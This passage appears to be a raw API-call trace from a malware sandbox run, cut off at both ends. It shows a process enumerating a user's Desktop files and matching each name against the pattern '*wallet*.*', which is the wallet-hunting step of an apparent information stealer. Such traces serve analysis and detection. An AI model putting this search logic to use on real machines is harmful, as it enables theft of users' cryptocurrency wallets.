hHeap=0x29a0000) returned 1 [0110.810] PathMatchSpecW (pszFile="O93_HCF.xlsx", pszSpec="*wallet*.*") returned 0 [0110.810] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706a0 | out: hHeap=0x29a0000) returned 1 [0110.810] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.810] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212b71d0, ftCreationTime.dwHighDateTime=0x1d7a377, ftLastAccessTime.dwLowDateTime=0xbbf74c40, ftLastAccessTime.dwHighDateTime=0x1d7ac26, ftLastWriteTime.dwLowDateTime=0xbbf74c40, ftLastWriteTime.dwHighDateTime=0x1d7ac26, nFileSizeHigh=0x0, nFileSizeLow=0x4735, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oar504.gif", cAlternateFileName="")) returned 1 [0110.810] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.810] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.810] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="Oar504.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif" [0110.810] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.810] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.810] lstrcatW (in: lpString1="\\", lpString2="Oar504.gif" | out: lpString1="\\Oar504.gif") returned="\\Oar504.gif" [0110.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Oar504.gif", lpUsedDefaultChar=0x0) returned 42 [0110.810] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.810] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.810] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ec0 | out: hHeap=0x29a0000) returned 1 [0110.810] PathMatchSpecW (pszFile="Oar504.gif", pszSpec="*wallet*.*") returned 0 [0110.810] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.810] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.810] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="p B1LdDcHaeS", cAlternateFileName="PB1LDD~1")) returned 1 [0110.810] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.810] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.811] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.811] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.811] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.811] lstrcatW (in: lpString1="\\", lpString2="p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.811] lstrcmpW (lpString1="p B1LdDcHaeS", lpString2=".") returned 1 [0110.811] lstrcmpW (lpString1="p B1LdDcHaeS", lpString2="..") returned 1 [0110.811] lstrcpyW (in: lpString1=0x19c8c0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.811] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*" [0110.811] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743420 [0110.811] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.811] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.811] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\." [0110.811] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.811] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.811] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="." | out: lpString1="\\p B1LdDcHaeS\\.") returned="\\p B1LdDcHaeS\\." [0110.811] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.811] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f850b00, ftCreationTime.dwHighDateTime=0x1d79feb, ftLastAccessTime.dwLowDateTime=0x5f0c9990, ftLastAccessTime.dwHighDateTime=0x1d7ae10, ftLastWriteTime.dwLowDateTime=0x5f0c9990, ftLastWriteTime.dwHighDateTime=0x1d7ae10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.811] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.811] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.811] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\.." [0110.811] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.811] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.812] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2=".." | out: lpString1="\\p B1LdDcHaeS\\..") returned="\\p B1LdDcHaeS\\.." [0110.812] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.812] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.812] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c5cc6e0, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x5ed18130, ftLastAccessTime.dwHighDateTime=0x1d7a4a0, ftLastWriteTime.dwLowDateTime=0x5ed18130, ftLastWriteTime.dwHighDateTime=0x1d7a4a0, nFileSizeHigh=0x0, nFileSizeLow=0x34c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="6eLLiqLz9t.avi", cAlternateFileName="6ELLIQ~1.AVI")) returned 1 [0110.812] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.812] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.812] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="6eLLiqLz9t.avi" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi" [0110.812] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.812] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.812] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="6eLLiqLz9t.avi" | out: lpString1="\\p B1LdDcHaeS\\6eLLiqLz9t.avi") returned="\\p B1LdDcHaeS\\6eLLiqLz9t.avi" [0110.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", cchWideChar=59, lpMultiByteStr=0x29a2e40, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\6eLLiqLz9t.avi", lpUsedDefaultChar=0x0) returned 59 [0110.812] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2e40 | out: hHeap=0x29a0000) returned 1 [0110.812] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970cc0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.812] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970cc0 | out: hHeap=0x29a0000) returned 1 [0110.812] PathMatchSpecW (pszFile="6eLLiqLz9t.avi", pszSpec="*wallet*.*") returned 0 [0110.812] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970358 | out: hHeap=0x29a0000) returned 1 [0110.812] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2810 | out: hHeap=0x29a0000) returned 1 [0110.812] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe18e7860, ftCreationTime.dwHighDateTime=0x1d7a074, ftLastAccessTime.dwLowDateTime=0x48a8aa90, ftLastAccessTime.dwHighDateTime=0x1d7ab22, ftLastWriteTime.dwLowDateTime=0x48a8aa90, ftLastWriteTime.dwHighDateTime=0x1d7ab22, nFileSizeHigh=0x0, nFileSizeLow=0xdfb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="D9uCaq_HSLxl.pdf", cAlternateFileName="D9UCAQ~1.PDF")) returned 1 [0110.812] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.812] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.812] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="D9uCaq_HSLxl.pdf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf" [0110.812] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.812] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.812] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="D9uCaq_HSLxl.pdf" | out: lpString1="\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf") returned="\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf" [0110.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0110.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", cchWideChar=61, lpMultiByteStr=0x29a2df8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\D9uCaq_HSLxl.pdf", lpUsedDefaultChar=0x0) returned 61 [0110.813] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2df8 | out: hHeap=0x29a0000) returned 1 [0110.813] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970d20, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.813] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d20 | out: hHeap=0x29a0000) returned 1 [0110.813] PathMatchSpecW (pszFile="D9uCaq_HSLxl.pdf", pszSpec="*wallet*.*") returned 0 [0110.813] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706c8 | out: hHeap=0x29a0000) returned 1 [0110.813] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2858 | out: hHeap=0x29a0000) returned 1 [0110.813] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8974c4f0, ftCreationTime.dwHighDateTime=0x1d7af73, ftLastAccessTime.dwLowDateTime=0x4d8c28d0, ftLastAccessTime.dwHighDateTime=0x1d7b012, ftLastWriteTime.dwLowDateTime=0x4d8c28d0, ftLastWriteTime.dwHighDateTime=0x1d7b012, nFileSizeHigh=0x0, nFileSizeLow=0x7537, dwReserved0=0x0, dwReserved1=0x0, cFileName="E144W5Mz.swf", cAlternateFileName="")) returned 1 [0110.813] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.813] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.813] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="E144W5Mz.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf" [0110.813] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.813] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.813] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="E144W5Mz.swf" | out: lpString1="\\p B1LdDcHaeS\\E144W5Mz.swf") returned="\\p B1LdDcHaeS\\E144W5Mz.swf" [0110.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0110.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", cchWideChar=57, lpMultiByteStr=0x29a27c8, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\E144W5Mz.swf", lpUsedDefaultChar=0x0) returned 57 [0110.813] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a27c8 | out: hHeap=0x29a0000) returned 1 [0110.813] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970e40, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.813] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e40 | out: hHeap=0x29a0000) returned 1 [0110.813] PathMatchSpecW (pszFile="E144W5Mz.swf", pszSpec="*wallet*.*") returned 0 [0110.813] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.813] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2b28 | out: hHeap=0x29a0000) returned 1 [0110.813] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd254fcd0, ftCreationTime.dwHighDateTime=0x1d7a618, ftLastAccessTime.dwLowDateTime=0x8a464820, ftLastAccessTime.dwHighDateTime=0x1d7aac5, ftLastWriteTime.dwLowDateTime=0x8a464820, ftLastWriteTime.dwHighDateTime=0x1d7aac5, nFileSizeHigh=0x0, nFileSizeLow=0xbc6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="lDOubGqNdXLFW1EA.wav", cAlternateFileName="LDOUBG~1.WAV")) returned 1 [0110.813] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.814] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.814] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="lDOubGqNdXLFW1EA.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav" [0110.814] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.814] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.814] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="lDOubGqNdXLFW1EA.wav" | out: lpString1="\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav") returned="\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav" [0110.814] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a04a0 [0110.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0110.814] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x41) returned 0x39700d0 [0110.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", cchWideChar=65, lpMultiByteStr=0x39700d0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\lDOubGqNdXLFW1EA.wav", lpUsedDefaultChar=0x0) returned 65 [0110.814] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38ea9f8 [0110.814] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.814] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.814] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970b60 [0110.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970b60, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.814] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703d0 [0110.814] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970b60 | out: hHeap=0x29a0000) returned 1 [0110.814] PathMatchSpecW (pszFile="lDOubGqNdXLFW1EA.wav", pszSpec="*wallet*.*") returned 0 [0110.814] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703d0 | out: hHeap=0x29a0000) returned 1 [0110.814] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea9f8 | out: hHeap=0x29a0000) returned 1 [0110.814] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, 